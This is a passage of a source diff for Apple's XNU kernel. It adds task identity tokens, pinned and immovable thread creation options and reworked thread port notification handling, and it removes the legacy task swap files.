+extern task_t proc_task(void* p);
+extern struct proc_ident proc_ident(void* p);
+extern kern_return_t task_conversion_eval(task_t caller, task_t victim);
+
+struct task_id_token {
+       struct proc_ident ident;
+       ipc_port_t        port;
+       os_refcnt_t       tidt_refs;
+};
+
+static ZONE_DECLARE(task_id_token_zone, "task_id_token",
+    sizeof(struct task_id_token), ZC_ZFREE_CLEARMEM);
+
+static void
+tidt_reference(task_id_token_t token)
+{
+       if (token == TASK_ID_TOKEN_NULL) {
+               return;
+       }
+       os_ref_retain(&token->tidt_refs);
+}
+
+static void
+tidt_release(task_id_token_t token)
+{
+       ipc_port_t port;
+
+       if (token == TASK_ID_TOKEN_NULL) {
+               return;
+       }
+
+       if (os_ref_release(&token->tidt_refs) > 0) {
+               return;
+       }
+
+       /* last ref */
+       port = token->port;
+
+       require_ip_active(port);
+       assert(!port->ip_srights);
+       ipc_port_dealloc_kernel(port);
+
+       zfree(task_id_token_zone, token);
+}
+
+void
+task_id_token_release(task_id_token_t token)
+{
+       tidt_release(token);
+}
+
+void
+task_id_token_notify(mach_msg_header_t *msg)
+{
+       assert(msg->msgh_id == MACH_NOTIFY_NO_SENDERS);
+
+       mach_no_senders_notification_t *not = (mach_no_senders_notification_t *)msg;
+       ipc_port_t port = not->not_header.msgh_remote_port;
+       task_id_token_t token = ip_get_kobject(port);
+
+       require_ip_active(port);
+       assert(IKOT_TASK_ID_TOKEN == ip_kotype(port));
+       assert(port->ip_srights == 0);
+
+       tidt_release(token); /* consumes ref given by notification */
+}
+
+kern_return_t
+task_create_identity_token(
+       task_t task,
+       task_id_token_t *tokenp)
+{
+       task_id_token_t token;
+
+       if (task == TASK_NULL || task == kernel_task) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       token = zalloc_flags(task_id_token_zone, Z_ZERO | Z_WAITOK | Z_NOFAIL);
+
+       task_lock(task);
+       if (task->bsd_info) {
+               token->port = IP_NULL;
+               token->ident = proc_ident(task->bsd_info);
+               /* this reference will be donated to no-senders notification */
+               os_ref_init_count(&token->tidt_refs, NULL, 1);
+       } else {
+               task_unlock(task);
+               zfree(task_id_token_zone, token);
+               return KERN_INVALID_ARGUMENT;
+       }
+       task_unlock(task);
+
+       *tokenp = token;
+
+       return KERN_SUCCESS;
+}
+
+kern_return_t
+task_identity_token_get_task_port(
+       task_id_token_t token,
+       task_flavor_t  flavor,
+       ipc_port_t    *portp)
+{
+       int which;
+       task_t task;
+       kern_return_t kr;
+
+       if (token == TASK_ID_TOKEN_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       switch (flavor) {
+       case TASK_FLAVOR_NAME:
+               which = TASK_NAME_PORT;
+               break;
+       case TASK_FLAVOR_INSPECT:
+               which = TASK_INSPECT_PORT;
+               break;
+       case TASK_FLAVOR_READ:
+               which = TASK_READ_PORT;
+               break;
+       case TASK_FLAVOR_CONTROL:
+               which = TASK_KERNEL_PORT;
+               break;
+       default:
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       void* p = proc_find_ident(&token->ident);
+       if (p == NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+       task = proc_task(p);
+       task_reference(task);
+       proc_rele(p);
+
+       if (task == TASK_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if (flavor == TASK_FLAVOR_CONTROL && task == current_task()) {
+               *portp = convert_task_to_port_pinned(task); /* consumes task ref */
+               return KERN_SUCCESS;
+       }
+       if (flavor <= TASK_FLAVOR_INSPECT && task_conversion_eval(current_task(), task)) {
+               task_deallocate(task);
+               return KERN_INVALID_ARGUMENT;
+       }
+
+#if CONFIG_MACF
+       if (task != current_task()) {
+               if (mac_task_check_task_id_token_get_task(task, flavor)) {
+                       task_deallocate(task);
+                       return KERN_DENIED;
+               }
+       }
+#endif
+
+       kr = task_get_special_port(task, which, portp);
+       task_deallocate(task);
+       return kr;
+}
+
+/* Produces token ref */
+task_id_token_t
+convert_port_to_task_id_token(
+       ipc_port_t              port)
+{
+       task_id_token_t token = TASK_ID_TOKEN_NULL;
+
+       if (IP_VALID(port)) {
+               ip_lock(port);
+               if (ip_active(port)) {
+                       if (ip_kotype(port) == IKOT_TASK_ID_TOKEN) {
+                               token = (task_id_token_t)ip_get_kobject(port);
+
+                               zone_require(task_id_token_zone, token);
+                               tidt_reference(token);
+                       }
+               }
+               ip_unlock(port);
+       }
+       return token;
+}
+
+/* Consumes token ref */
+ipc_port_t
+convert_task_id_token_to_port(
+       task_id_token_t token)
+{
+       boolean_t kr;
+
+       if (token == TASK_ID_TOKEN_NULL) {
+               return IP_NULL;
+       }
+
+       zone_require(task_id_token_zone, token);
+
+       kr = ipc_kobject_make_send_lazy_alloc_port(&token->port,
+           (ipc_kobject_t) token, IKOT_TASK_ID_TOKEN, IPC_KOBJECT_ALLOC_NONE, false, 0);
+       assert(kr == TRUE); /* no-senders notification is armed, consumes token ref */
+
+       return token->port;
+}
diff --git a/osfmk/kern/task_ident.h b/osfmk/kern/task_ident.h
new file mode 100644 (file)
index 0000000..5d3bee1
--- /dev/null
@@ -0,0 +1,55 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+/*
+ *
+ * A task identity token represents the identity of a mach task without carrying task
+ * access capabilities. In applicable scenarios, task identity token can be moved between
+ * tasks and be upgraded to desired level of task port flavor (namely, task name port,
+ * inspect port, read port or control port) upon use.
+ *
+ */
+
+#ifndef _KERN_TASK_IDENT_H
+#define _KERN_TASK_IDENT_H
+
+#if XNU_KERNEL_PRIVATE
+
+#include <kern/kern_types.h>
+#include <mach/mach_types.h>
+
+void task_id_token_notify(mach_msg_header_t *msg);
+void task_id_token_release(task_id_token_t token);
+
+ipc_port_t convert_task_id_token_to_port(task_id_token_t token);
+
+task_id_token_t convert_port_to_task_id_token(ipc_port_t port);
+
+#endif /* XNU_KERNEL_PRIVATE */
+
+#endif /* _KERN_TASK_IDENT_H */
index 4423fd07758a5edf93c75cfaf8ef854eff49fcd9..b9664280336530631e13311409985d394a1134b0 100644 (file)
@@ -3177,10 +3177,9 @@ task_removewatchers(task_t task)
        queue_head_t queue;
        task_watch_t *twp;
 
-       queue_init(&queue);
-
        task_watch_lock();
-       movqueue(&queue, &task->task_watchers);
+       queue_new_head(&task->task_watchers, &queue, task_watch_t *, tw_links);
+       queue_init(&task->task_watchers);
 
        queue_iterate(&queue, twp, task_watch_t *, tw_links) {
                /*
@@ -3193,7 +3192,8 @@ task_removewatchers(task_t task)
        task->num_taskwatchers = 0;
        task_watch_unlock();
 
-       while ((twp = qe_dequeue_head(&task->task_watchers, task_watch_t, tw_links)) != NULL) {
+       while (!queue_empty(&queue)) {
+               queue_remove_first(&queue, twp, task_watch_t *, tw_links);
                /* remove thread and network bg */
                set_thread_appbg(twp->tw_thread, 0, twp->tw_importance);
                thread_deallocate(twp->tw_thread);
diff --git a/osfmk/kern/task_swap.c b/osfmk/kern/task_swap.c
deleted file mode 100644 (file)
index 42a7318..0000000
+++ /dev/null
@@ -1,76 +0,0 @@
-/*
- * Copyright (c) 2000-2004 Apple Computer, Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- * @OSF_COPYRIGHT@
- */
-/*
- *             File:   kern/task_swap.c
- *
- *     Task residency management primitives implementation.
- */
-#include <mach_assert.h>
-#include <task_swapper.h>
-
-#include <kern/spl.h>
-#include <kern/queue.h>
-#include <kern/host.h>
-#include <kern/task.h>
-#include <kern/task_swap.h>
-#include <kern/thread.h>
-#include <kern/host_statistics.h>
-#include <kern/misc_protos.h>
-#include <kern/assert.h>
-#include <mach/policy.h>
-
-#include <ipc/ipc_port.h>       /* We use something from in here */
-
-/*
- *     task_swappable: [exported]
- *
- *     Make a task swappable or non-swappable. If made non-swappable,
- *     it will be swapped in.
- */
-kern_return_t
-task_swappable(
-       host_priv_t host_priv,
-       task_t task,
-       __unused boolean_t make_swappable)
-{
-       if (host_priv == HOST_PRIV_NULL) {
-               return KERN_INVALID_ARGUMENT;
-       }
-
-       if (task == TASK_NULL) {
-               return KERN_INVALID_ARGUMENT;
-       }
-
-       /*
-        * We don't support swapping, this call is purely advisory.
-        */
-       return KERN_SUCCESS;
-}
diff --git a/osfmk/kern/task_swap.h b/osfmk/kern/task_swap.h
deleted file mode 100644 (file)
index 5972ca3..0000000
+++ /dev/null
@@ -1,135 +0,0 @@
-/*
- * Copyright (c) 2000 Apple Computer, Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- * @OSF_COPYRIGHT@
- */
-/*
- * HISTORY
- *
- * Revision 1.1.1.1  1998/09/22 21:05:32  wsanchez
- * Import of Mac OS X kernel (~semeria)
- *
- * Revision 1.1.1.1  1998/03/07 02:25:56  wsanchez
- * Import of OSF Mach kernel (~mburg)
- *
- * Revision 1.1.4.1  1995/04/07  19:02:38  barbou
- *      Merged into mainline.
- *      [95/03/09            barbou]
- *
- * Revision 1.1.2.2  1995/02/13  15:35:45  barbou
- *      Merged/ported to MK6.
- *
- * Revision 1.1.1.3  94/08/12  15:44:39  barbou
- *      VM Merge - Task Swapper.
- *
- *      Changed host_priv_t into host_t.
- *      [94/07/28            barbou]
- *
- * Revision 1.1.1.2  1994/07/28  15:33:46  barbou
- *      Copied from IK.
- *
- * Revision 3.0.3.2  1994/01/20  19:53:01  chasb
- *      Remove excessively restrictive copyright notice
- *      [1994/01/20  17:50:40  chasb]
- *
- * Revision 3.0.3.1  1993/12/20  21:06:49  gupta
- *      Expanded C O P Y R I G H T
- *      [1993/12/17  22:19:22  gupta]
- *
- * Revision 3.0  1992/12/31  22:08:24  ede
- *      Initial revision for OSF/1 R1.3
- *
- * Revision 1.1.4.5  1992/03/16  18:02:52  gmf
- *      Add TASK_SW_ELIGIBLE flag to swap_flags; prototype
- *      task_swapout_eligible, task_swapout_ineligible.
- *      [1992/02/12  22:01:48  gmf]
- *
- * Revision 1.1.4.4  1992/01/22  22:14:13  gmf
- *      Change prototype for task_swappable() to use host_priv_t
- *      instead of host_t.
- *      [1992/01/17  17:48:13  gmf]
- *
- * Revision 1.1.4.3  1991/12/10  17:20:55  gmf
- *      Add extern declaration for new thread.
- *      Changed TASK_SW_WAIT flag to TASK_SW_WANT_IN.
- *      [1991/12/10  16:19:10  gmf]
- *
- * Revision 1.1.4.2  1991/11/21  21:48:35  mmp
- *      initial task swapping code
- *      [1991/11/21  21:01:37  mmp]
- *
- * $EndLog$
- */
-
-/*
- *             File:   kern/task_swap.h
- *
- *     Task residency management primitives declarations.
- */
-
-#ifndef _KERN_TASK_SWAP_H_
-#define _KERN_TASK_SWAP_H_
-
-#include <kern/host.h>
-
-/*
- *     swap states
- */
-#define TASK_SW_UNSWAPPABLE     1       /* not swappable */
-#define TASK_SW_IN              2       /* swapped in (resident) */
-#define TASK_SW_OUT             3       /* swapped out (non-resident) */
-#define TASK_SW_COMING_IN       4       /* about to be swapped in */
-#define TASK_SW_GOING_OUT       5       /* being swapped out */
-
-/*
- *     swap flags
- */
-#define TASK_SW_MAKE_UNSWAPPABLE        0x01    /* make it unswappable */
-#define TASK_SW_WANT_IN                 0x02    /* sleeping on state */
-#define TASK_SW_ELIGIBLE                0x04    /* eligible for swapping */
-
-/*
- * exported routines
- */
-extern void task_swapper_init(void);
-extern kern_return_t task_swapin(
-       task_t,                                 /* task */
-       boolean_t);                             /* make_unswappable */
-extern kern_return_t task_swapout(task_t /* task */);
-extern void task_swapper(void);
-extern void task_swap_swapout_thread(void);
-extern void compute_vm_averages(void);
-extern kern_return_t task_swappable(
-       host_priv_t,                            /* host */
-       task_t,                                 /* task */
-       boolean_t);                             /* swappable */
-extern void task_swapout_eligible(task_t /* task */);
-extern void task_swapout_ineligible(task_t /* task */);
-extern void swapout_ast(void);
-
-#endif  /* _KERN_TASK_SWAP_H_ */
index b777052d4afb62eb12fd4d886a538af16e7b6975..dd71cf230b8a943d4f03feabfbbecf2046d71e0e 100644 (file)
@@ -495,31 +495,6 @@ telemetry_take_sample(thread_t thread, uint8_t microsnapshot_flags, struct micro
        }
        bool user64_va = task_has_64Bit_addr(task);
 
-       /*
-        * Find the actual [slid] address of the shared cache's UUID, and copy it in from userland.
-        */
-       int shared_cache_uuid_valid = 0;
-       uint64_t shared_cache_base_address = 0;
-       struct _dyld_cache_header shared_cache_header = {};
-       uint64_t shared_cache_slide = 0;
-
-       /*
-        * Don't copy in the entire shared cache header; we only need the UUID. Calculate the
-        * offset of that one field.
-        */
-       int sc_header_uuid_offset = (char *)&shared_cache_header.uuid - (char *)&shared_cache_header;
-       vm_shared_region_t sr = vm_shared_region_get(task);
-       if (sr != NULL) {
-               if ((vm_shared_region_start_address(sr, &shared_cache_base_address) == KERN_SUCCESS) &&
-                   (copyin(shared_cache_base_address + sc_header_uuid_offset, (char *)&shared_cache_header.uuid,
-                   sizeof(shared_cache_header.uuid)) == 0)) {
-                       shared_cache_uuid_valid = 1;
-                       shared_cache_slide = sr->sr_slide;
-               }
-               // vm_shared_region_get() gave us a reference on the shared region.
-               vm_shared_region_deallocate(sr);
-       }
-
        /*
         * Retrieve the array of UUID's for binaries used by this task.
         * We reach down into DYLD's data structures to find the array.
@@ -670,7 +645,7 @@ copytobuffer:
        tsnap->system_time_in_terminated_threads = task->total_system_time;
        tsnap->suspend_count = task->suspend_count;
        tsnap->task_size = (typeof(tsnap->task_size))(get_task_phys_footprint(task) / PAGE_SIZE);
-       tsnap->faults = task->faults;
+       tsnap->faults = counter_load(&task->faults);
        tsnap->pageins = task->pageins;
        tsnap->cow_faults = task->cow_faults;
        /*
@@ -713,9 +688,11 @@ copytobuffer:
                tsnap->ss_flags |= kUser64_p;
        }
 
-       if (shared_cache_uuid_valid) {
-               tsnap->shared_cache_slide = shared_cache_slide;
-               bcopy(shared_cache_header.uuid, tsnap->shared_cache_identifier, sizeof(shared_cache_header.uuid));
+
+       if (task->task_shared_region_slide != -1) {
+               tsnap->shared_cache_slide = task->task_shared_region_slide;
+               bcopy(task->task_shared_region_uuid, tsnap->shared_cache_identifier,
+                   sizeof(task->task_shared_region_uuid));
        }
 
        current_buffer->current_position += sizeof(struct task_snapshot);
index 0c7bbc603640d22ceb122735ec8443b7c199a3de..08740e361f9db96d06522233a66671b226f71f9b 100644 (file)
@@ -97,7 +97,6 @@
 #include <kern/kern_types.h>
 #include <kern/kalloc.h>
 #include <kern/cpu_data.h>
-#include <kern/counters.h>
 #include <kern/extmod_statistics.h>
 #include <kern/ipc_mig.h>
 #include <kern/ipc_tt.h>
@@ -343,7 +342,7 @@ thread_corpse_continue(void)
 {
        thread_t thread = current_thread();
 
-       thread_terminate_internal(thread);
+       thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE);
 
        /*
         * Handle the thread termination directly
@@ -708,6 +707,12 @@ thread_deallocate_complete(
        thread->thread_magic = 0;
 #endif /* MACH_ASSERT */
 
+       lck_mtx_lock(&tasks_threads_lock);
+       assert(terminated_threads_count > 0);
+       queue_remove(&terminated_threads, thread, thread_t, threads);
+       terminated_threads_count--;
+       lck_mtx_unlock(&tasks_threads_lock);
+
        zfree(thread_zone, thread);
 }
 
@@ -899,6 +904,8 @@ thread_terminate_queue_invoke(mpsc_queue_chain_t e,
        lck_mtx_lock(&tasks_threads_lock);
        queue_remove(&threads, thread, thread_t, threads);
        threads_count--;
+       queue_enter(&terminated_threads, thread, thread_t, threads);
+       terminated_threads_count++;
        lck_mtx_unlock(&tasks_threads_lock);
 
        thread_deallocate(thread);
@@ -1050,10 +1057,14 @@ thread_daemon_init(void)
        }
 }
 
-#define TH_OPTION_NONE          0x00
-#define TH_OPTION_NOCRED        0x01
-#define TH_OPTION_NOSUSP        0x02
-#define TH_OPTION_WORKQ         0x04
+__options_decl(thread_create_internal_options_t, uint32_t, {
+       TH_OPTION_NONE          = 0x00,
+       TH_OPTION_NOCRED        = 0x01,
+       TH_OPTION_NOSUSP        = 0x02,
+       TH_OPTION_WORKQ         = 0x04,
+       TH_OPTION_IMMOVABLE     = 0x08,
+       TH_OPTION_PINNED        = 0x10,
+});
 
 /*
  * Create a new thread.
@@ -1065,13 +1076,14 @@ static kern_return_t
 thread_create_internal(
        task_t                                  parent_task,
        integer_t                               priority,
-       thread_continue_t               continuation,
+       thread_continue_t                       continuation,
        void                                    *parameter,
-       int                                             options,
+       thread_create_internal_options_t        options,
        thread_t                                *out_thread)
 {
        thread_t                                new_thread;
-       static thread_t                 first_thread;
+       static thread_t                         first_thread;
+       ipc_thread_init_options_t init_options = IPC_THREAD_INIT_NONE;
 
        /*
         *      Allocate a thread and initialize static fields
@@ -1089,6 +1101,14 @@ thread_create_internal(
                init_thread_from_template(new_thread);
        }
 
+       if (options & TH_OPTION_PINNED) {
+               init_options |= IPC_THREAD_INIT_PINNED;
+       }
+
+       if (options & TH_OPTION_IMMOVABLE) {
+               init_options |= IPC_THREAD_INIT_IMMOVABLE;
+       }
+
        os_ref_init_count(&new_thread->ref_count, &thread_refgrp, 2);
 #if DEBUG || DEVELOPMENT
        queue_init(&new_thread->t_temp_alloc_list);
@@ -1132,7 +1152,7 @@ thread_create_internal(
 
        lck_mtx_init(&new_thread->mutex, &thread_lck_grp, LCK_ATTR_NULL);
 
-       ipc_thread_init(new_thread);
+       ipc_thread_init(new_thread, init_options);
 
        new_thread->continuation = continuation;
        new_thread->parameter = parameter;
@@ -1363,14 +1383,15 @@ thread_create_internal(
 }
 
 static kern_return_t
-thread_create_internal2(
-       task_t                          task,
-       thread_t                        *new_thread,
-       boolean_t                       from_user,
-       thread_continue_t               continuation)
+thread_create_with_options_internal(
+       task_t                            task,
+       thread_t                          *new_thread,
+       boolean_t                         from_user,
+       thread_create_internal_options_t  options,
+       thread_continue_t                 continuation)
 {
        kern_return_t           result;
-       thread_t                        thread;
+       thread_t                thread;
 
        if (task == TASK_NULL || task == kernel_task) {
                return KERN_INVALID_ARGUMENT;
@@ -1383,7 +1404,7 @@ thread_create_internal2(
        }
 #endif
 
-       result = thread_create_internal(task, -1, continuation, NULL, TH_OPTION_NONE, &thread);
+       result = thread_create_internal(task, -1, continuation, NULL, options, &thread);
        if (result != KERN_SUCCESS) {
                return result;
        }
@@ -1417,7 +1438,30 @@ thread_create(
        task_t                          task,
        thread_t                        *new_thread)
 {
-       return thread_create_internal2(task, new_thread, FALSE, (thread_continue_t)thread_bootstrap_return);
+       return thread_create_with_options_internal(task, new_thread, FALSE, TH_OPTION_NONE,
+                  (thread_continue_t)thread_bootstrap_return);
+}
+
+/*
+ * Create a thread that has its itk_self pinned
+ * Deprecated, should be cleanup once rdar://70892168 lands
+ */
+kern_return_t
+thread_create_pinned(
+       task_t                          task,
+       thread_t                        *new_thread)
+{
+       return thread_create_with_options_internal(task, new_thread, FALSE,
+                  TH_OPTION_PINNED | TH_OPTION_IMMOVABLE, (thread_continue_t)thread_bootstrap_return);
+}
+
+kern_return_t
+thread_create_immovable(
+       task_t                          task,
+       thread_t                        *new_thread)
+{
+       return thread_create_with_options_internal(task, new_thread, FALSE,
+                  TH_OPTION_IMMOVABLE, (thread_continue_t)thread_bootstrap_return);
 }
 
 kern_return_t
@@ -1425,7 +1469,8 @@ thread_create_from_user(
        task_t                          task,
        thread_t                        *new_thread)
 {
-       return thread_create_internal2(task, new_thread, TRUE, (thread_continue_t)thread_bootstrap_return);
+       return thread_create_with_options_internal(task, new_thread, TRUE, TH_OPTION_NONE,
+                  (thread_continue_t)thread_bootstrap_return);
 }
 
 kern_return_t
@@ -1434,7 +1479,7 @@ thread_create_with_continuation(
        thread_t                        *new_thread,
        thread_continue_t               continuation)
 {
-       return thread_create_internal2(task, new_thread, FALSE, continuation);
+       return thread_create_with_options_internal(task, new_thread, FALSE, TH_OPTION_NONE, continuation);
 }
 
 /*
@@ -1487,13 +1532,24 @@ thread_create_waiting_internal(
 
 kern_return_t
 thread_create_waiting(
-       task_t                  task,
-       thread_continue_t       continuation,
-       event_t                 event,
-       thread_t                *new_thread)
+       task_t                          task,
+       thread_continue_t               continuation,
+       event_t                         event,
+       th_create_waiting_options_t     options,
+       thread_t                        *new_thread)
 {
+       thread_create_internal_options_t ci_options = TH_OPTION_NONE;
+
+       assert((options & ~TH_CREATE_WAITING_OPTION_MASK) == 0);
+       if (options & TH_CREATE_WAITING_OPTION_PINNED) {
+               ci_options |= TH_OPTION_PINNED;
+       }
+       if (options & TH_CREATE_WAITING_OPTION_IMMOVABLE) {
+               ci_options |= TH_OPTION_IMMOVABLE;
+       }
+
        return thread_create_waiting_internal(task, continuation, event,
-                  kThreadWaitNone, TH_OPTION_NONE, new_thread);
+                  kThreadWaitNone, ci_options, new_thread);
 }
 
 
@@ -1605,7 +1661,13 @@ thread_create_workq_waiting(
        thread_continue_t   continuation,
        thread_t            *new_thread)
 {
-       int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ;
+       /*
+        * Create thread, but don't pin control port just yet, in case someone calls
+        * task_threads() and deallocates pinned port before kernel copyout happens,
+        * which will result in pinned port guard exception. Instead, pin and make
+        * it immovable atomically at copyout during workq_setup_and_run().
+        */
+       int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ | TH_OPTION_IMMOVABLE;
        return thread_create_waiting_internal(task, continuation, NULL,
                   kThreadWaitParkedWorkQueue, options, new_thread);
 }
@@ -2068,8 +2130,6 @@ thread_wire_internal(
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(host_priv == &realhost);
-
        if (prev_state) {
                *prev_state = (thread->options & TH_OPT_VMPRIV) != 0;
        }
@@ -3163,7 +3223,7 @@ thread_port_with_flavor_notify(mach_msg_header_t *msg)
                ip_unlock(port);
                return;
        }
-       thread = (thread_t)port->ip_kobject;
+       thread = (thread_t)ipc_kobject_get(port);
        kotype = ip_kotype(port);
        if (thread != THREAD_NULL) {
                assert((IKOT_THREAD_READ == kotype) || (IKOT_THREAD_INSPECT == kotype));
@@ -3176,28 +3236,39 @@ thread_port_with_flavor_notify(mach_msg_header_t *msg)
                return;
        }
 
+       if (kotype == IKOT_THREAD_READ) {
+               flavor = THREAD_FLAVOR_READ;
+       } else {
+               flavor = THREAD_FLAVOR_INSPECT;
+       }
+
        thread_mtx_lock(thread);
        ip_lock(port);
-       require_ip_active(port);
        /*
+        * If the port is no longer active, then ipc_thread_terminate() ran
+        * and destroyed the kobject already. Just deallocate the task
+        * ref we took and go away.
+        *
+        * It is also possible that several nsrequests are in flight,
+        * only one shall NULL-out the port entry, and this is the one
+        * that gets to dealloc the port.
+        *
         * Check for a stale no-senders notification. A call to any function
         * that vends out send rights to this port could resurrect it between
         * this notification being generated and actually being handled here.
         */
-       if (port->ip_srights > 0) {
+       if (!ip_active(port) ||
+           thread->ith_thread_ports[flavor] != port ||
+           port->ip_srights > 0) {
                ip_unlock(port);
                thread_mtx_unlock(thread);
                thread_deallocate(thread);
                return;
        }
-       if (kotype == IKOT_THREAD_READ) {
-               flavor = THREAD_FLAVOR_READ;
-       } else {
-               flavor = THREAD_FLAVOR_INSPECT;
-       }
-       assert(thread->ith_self[flavor] == port);
-       thread->ith_self[flavor] = IP_NULL;
-       port->ip_kobject = IKOT_NONE;
+
+       assert(thread->ith_thread_ports[flavor] == port);
+       thread->ith_thread_ports[flavor] = IP_NULL;
+       ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE);
        ip_unlock(port);
        thread_mtx_unlock(thread);
        thread_deallocate(thread);
index 475f0c678f2852ce480da733049452404e3e2d33..9f61d1fc4b6c874d4f6bf1e983722bad887be70d 100644 (file)
@@ -256,6 +256,9 @@ struct thread {
        vm_offset_t             kernel_stack;   /* current kernel stack */
        vm_offset_t             reserved_stack; /* reserved kernel stack */
 
+       /*** Machine-dependent state ***/
+       struct machine_thread   machine;
+
 #if KASAN
        struct kasan_thread_data kasan_data;
 #endif
@@ -516,13 +519,14 @@ struct thread {
 
        /* Miscellaneous bits guarded by mutex */
        uint32_t
-           active:1,                                   /* Thread is active and has not been terminated */
-           started:1,                                  /* Thread has been started after creation */
-           static_param:1,                             /* Disallow policy parameter changes */
-           inspection:1,                               /* TRUE when task is being inspected by crash reporter */
-           policy_reset:1,                             /* Disallow policy parameter changes on terminating threads */
-           suspend_parked:1,                           /* thread parked in thread_suspended */
-           corpse_dup:1,                               /* TRUE when thread is an inactive duplicate in a corpse */
+           active:1,           /* Thread is active and has not been terminated */
+           ipc_active:1,       /* IPC with the thread ports is allowed */
+           started:1,          /* Thread has been started after creation */
+           static_param:1,     /* Disallow policy parameter changes */
+           inspection:1,       /* TRUE when task is being inspected by crash reporter */
+           policy_reset:1,     /* Disallow policy parameter changes on terminating threads */
+           suspend_parked:1,   /* thread parked in thread_suspended */
+           corpse_dup:1,       /* TRUE when thread is an inactive duplicate in a corpse */
        :0;
 
        decl_lck_mtx_data(, mutex);
@@ -531,8 +535,9 @@ struct thread {
         * Different flavors of thread port.
         * These flavors THREAD_FLAVOR_* are defined in mach_types.h
         */
-       struct ipc_port         *ith_self[THREAD_SELF_PORT_COUNT];        /* does not hold right */
+       struct ipc_port         *ith_thread_ports[THREAD_SELF_PORT_COUNT];        /* does not hold right */
        struct ipc_port         *ith_settable_self;        /* a send right */
+       struct ipc_port         *ith_self;                 /* immovable/pinned thread port */
        struct ipc_port         *ith_special_reply_port;   /* ref to special reply port */
        struct exception_action *exc_actions;
 
@@ -593,9 +598,6 @@ struct thread {
        void                   *hv_thread_target;
 #endif /* HYPERVISOR */
 
-       /*** Machine-dependent state ***/
-       struct machine_thread   machine;
-
        /* Statistics accumulated per-thread and aggregated per-task */
        uint32_t                syscalls_unix;
        uint32_t                syscalls_mach;
@@ -662,13 +664,13 @@ struct thread {
 #if     SCHED_TRACE_THREAD_WAKEUPS
        uintptr_t               thread_wakeup_bt[64];
 #endif
-       turnstile_update_flags_t inheritor_flags; /* inheritor flags for inheritor field */
-       block_hint_t            pending_block_hint;
-       block_hint_t            block_hint;      /* What type of primitive last caused us to block. */
-       integer_t               decompressions;  /* Per-thread decompressions counter to be added to per-task decompressions counter */
-       int                     thread_region_page_shift; /* Page shift that this thread would like to use when */
-                                                         /* introspecting a task. This is currently being used */
-                                                         /* by footprint which uses a thread for each task being inspected. */
+       turnstile_update_flags_t inheritor_flags;          /* inheritor flags for inheritor field */
+       block_hint_t             pending_block_hint;
+       block_hint_t             block_hint;               /* What type of primitive last caused us to block. */
+       integer_t                decompressions;           /* Per-thread decompressions counter to be added to per-task decompressions counter */
+       int                      thread_region_page_shift; /* Page shift that this thread would like to use when */
+                                                          /* introspecting a task. This is currently being used */
